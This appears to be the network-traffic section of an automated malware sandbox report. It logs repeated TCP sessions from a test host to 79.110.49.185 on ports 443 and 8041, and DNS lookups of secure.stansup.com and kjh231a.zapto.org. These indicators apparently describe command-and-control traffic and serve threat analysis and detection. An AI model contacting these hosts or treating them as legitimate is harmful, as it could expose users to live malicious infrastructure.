                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:45.350058079 CEST49780443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:45.350058079 CEST49780443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:45.351077080 CEST4434978079.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:45.351094961 CEST4434978079.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:45.351197004 CEST49780443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:45.351214886 CEST4434978079.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:45.398252964 CEST49780443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:45.466237068 CEST4434978079.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:45.466248035 CEST4434978079.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:45.466325998 CEST49780443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:45.466341019 CEST4434978079.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:45.466387033 CEST4434978079.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:45.466406107 CEST49780443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:45.466424942 CEST49780443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:45.467587948 CEST4434978079.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:45.467608929 CEST4434978079.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:45.467650890 CEST49780443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:45.467669010 CEST4434978079.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:45.467696905 CEST49780443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:45.467715025 CEST49780443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:45.468426943 CEST4434978079.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:45.468486071 CEST49780443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:45.469044924 CEST49780443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:45.469086885 CEST4434978079.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:45.469150066 CEST49780443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:45.485980988 CEST49791443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:45.486021042 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:45.488027096 CEST49791443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:45.488471031 CEST49791443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:45.488482952 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:46.334682941 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:46.334827900 CEST49791443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:46.336981058 CEST49791443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:46.336988926 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:46.337194920 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:46.338774920 CEST49791443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:46.379339933 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:46.702251911 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:46.702271938 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:46.702286005 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:46.702353001 CEST49791443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:46.702364922 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:46.702423096 CEST49791443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:46.703844070 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.544414997 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.544452906 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.544471979 CEST49791443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.544487953 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.544518948 CEST49791443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.544523954 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.544548035 CEST49791443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.544559002 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.544590950 CEST49791443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.544615030 CEST49791443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.545034885 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.545075893 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.545115948 CEST49791443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.545149088 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.545172930 CEST49791443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.545207977 CEST49791443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.545793056 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.545833111 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.545892000 CEST49791443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.545919895 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.545947075 CEST49791443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.545964003 CEST49791443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.662642956 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.662672043 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.662955999 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.662996054 CEST49791443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.663017035 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.663067102 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.663095951 CEST49791443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.663095951 CEST49791443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.664061069 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.664077044 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.664136887 CEST49791443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.664154053 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.664536953 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.664556026 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.664593935 CEST49791443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.664603949 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.664630890 CEST49791443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.710844994 CEST49791443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.771682978 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.771711111 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.771893978 CEST49791443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.771919966 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.771975994 CEST49791443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.781790018 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.781809092 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.781953096 CEST49791443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.781974077 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.782016039 CEST49791443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.782304049 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.782320976 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.782366037 CEST49791443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.782372952 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.782403946 CEST49791443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.783133030 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.783186913 CEST49791443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.783194065 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.783206940 CEST4434979179.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.783238888 CEST49791443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.811027050 CEST49791443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.973088980 CEST49803443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.973161936 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.973278046 CEST49803443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.973639965 CEST49803443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:47.973658085 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:48.811765909 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:48.813369989 CEST49803443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:48.813421965 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:49.178742886 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:49.178771019 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:49.178786993 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:49.178917885 CEST49803443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:49.178968906 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:49.179033995 CEST49803443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:49.184468031 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:49.184493065 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:49.184628010 CEST49803443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:49.184640884 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:49.226351976 CEST49803443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:49.295922041 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:49.295947075 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:49.296037912 CEST49803443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:49.296086073 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:49.296137094 CEST49803443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:49.300694942 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:49.300719023 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:49.300781965 CEST49803443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.123800993 CEST49803443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.123850107 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.123894930 CEST49803443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.124057055 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.124075890 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.124124050 CEST49803443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.124133110 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.124171019 CEST49803443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.125423908 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.125446081 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.125524998 CEST49803443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.125544071 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.125581980 CEST49803443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.129476070 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.129503012 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.129561901 CEST49803443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.129582882 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.129601002 CEST49803443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.129621983 CEST49803443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.274903059 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.274930000 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.275012970 CEST49803443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.275063038 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.275084019 CEST49803443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.275106907 CEST49803443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.275249958 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.275264978 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.275329113 CEST49803443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.275337934 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.275384903 CEST49803443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.275588989 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.275618076 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.275684118 CEST49803443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.275692940 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.275799990 CEST49803443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.276401997 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.276420116 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.276462078 CEST49803443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.276472092 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.276499033 CEST49803443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.276515961 CEST49803443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.307102919 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.307131052 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.307229996 CEST49803443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.307281971 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.307334900 CEST49803443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.392359972 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.392390966 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.392522097 CEST49803443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.392574072 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.392604113 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.392625093 CEST49803443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.392633915 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.392658949 CEST49803443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.392692089 CEST49803443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.392755985 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.392811060 CEST4434980379.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.392874002 CEST49803443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:50.396476030 CEST49803443192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:54.261533976 CEST498398041192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:54.267290115 CEST80414983979.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:54.267383099 CEST498398041192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:55.086055994 CEST498398041192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:55.091696024 CEST80414983979.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:55.326282024 CEST80414983979.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:55.352086067 CEST498398041192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:55.357498884 CEST80414983979.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:55.603033066 CEST80414983979.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:55.628624916 CEST80414983979.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:55.628695011 CEST498398041192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:57.221227884 CEST498398041192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:57.221390963 CEST498398041192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:57.438357115 CEST80414983979.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:57.438785076 CEST80414983979.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:57.438901901 CEST80414983979.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:57.438913107 CEST80414983979.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:29:57.439008951 CEST80414983979.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:30:16.542691946 CEST80414983979.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:30:16.554661989 CEST498398041192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:30:16.560374975 CEST80414983979.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:30:20.102979898 CEST80414983979.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:30:20.117085934 CEST498398041192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:30:20.122661114 CEST80414983979.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:30:49.970061064 CEST80414983979.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:30:49.976560116 CEST498398041192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:30:49.982139111 CEST80414983979.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:31:08.471048117 CEST80414983979.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:31:08.476434946 CEST498398041192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:31:08.482031107 CEST80414983979.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:31:16.442533970 CEST80414983979.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:31:16.445117950 CEST498398041192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:31:16.450488091 CEST80414983979.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:31:20.072031021 CEST80414983979.110.49.185192.168.2.5
                                                                                                                                                                                                                                                      Oct 25, 2024 19:31:20.086262941 CEST498398041192.168.2.579.110.49.185
                                                                                                                                                                                                                                                      Oct 25, 2024 19:31:20.091907978 CEST80414983979.110.49.185192.168.2.5
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Oct 25, 2024 19:29:15.950680017 CEST | 59984 | 53 | 192.168.2.5 | 1.1.1.1 |
| Oct 25, 2024 19:29:16.176943064 CEST | 53 | 59984 | 1.1.1.1 | 192.168.2.5 |
| Oct 25, 2024 19:29:54.217612982 CEST | 60920 | 53 | 192.168.2.5 | 1.1.1.1 |
| Oct 25, 2024 19:29:54.229527950 CEST | 53 | 60920 | 1.1.1.1 | 192.168.2.5 |

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Oct 25, 2024 19:29:15.950680017 CEST | 192.168.2.5 | 1.1.1.1 | 0xab37 | Standard query (0) | secure.stansup.com | A (IP address) | IN (0x0001) | false |
| Oct 25, 2024 19:29:54.217612982 CEST | 192.168.2.5 | 1.1.1.1 | 0xc368 | Standard query (0) | kjh231a.zapto.org | A (IP address) | IN (0x0001) | false |

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Oct 25, 2024 19:29:16.176943064 CEST | 1.1.1.1 | 192.168.2.5 | 0xab37 | No error (0) | secure.stansup.com | | 79.110.49.185 | A (IP address) | IN (0x0001) | false |
| Oct 25, 2024 19:29:19.577104092 CEST | 1.1.1.1 | 192.168.2.5 | 0x51de | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Oct 25, 2024 19:29:19.577104092 CEST | 1.1.1.1 | 192.168.2.5 | 0x51de | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 84.201.210.18 | A (IP address) | IN (0x0001) | false |
| Oct 25, 2024 19:29:19.577104092 CEST | 1.1.1.1 | 192.168.2.5 | 0x51de | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.37 | A (IP address) | IN (0x0001) | false |
| Oct 25, 2024 19:29:19.577104092 CEST | 1.1.1.1 | 192.168.2.5 | 0x51de | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.40 | A (IP address) | IN (0x0001) | false |
| Oct 25, 2024 19:29:19.577104092 CEST | 1.1.1.1 | 192.168.2.5 | 0x51de | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 84.201.210.37 | A (IP address) | IN (0x0001) | false |
| Oct 25, 2024 19:29:19.577104092 CEST | 1.1.1.1 | 192.168.2.5 | 0x51de | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 84.201.210.38 | A (IP address) | IN (0x0001) | false |
| Oct 25, 2024 19:29:19.577104092 CEST | 1.1.1.1 | 192.168.2.5 | 0x51de | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.35 | A (IP address) | IN (0x0001) | false |
| Oct 25, 2024 19:29:19.577104092 CEST | 1.1.1.1 | 192.168.2.5 | 0x51de | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 84.201.210.20 | A (IP address) | IN (0x0001) | false |
| Oct 25, 2024 19:29:19.577104092 CEST | 1.1.1.1 | 192.168.2.5 | 0x51de | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 84.201.210.21 | A (IP address) | IN (0x0001) | false |
| Oct 25, 2024 19:29:20.556807995 CEST | 1.1.1.1 | 192.168.2.5 | 0xab9c | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Oct 25, 2024 19:29:20.556807995 CEST | 1.1.1.1 | 192.168.2.5 | 0xab9c | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false |
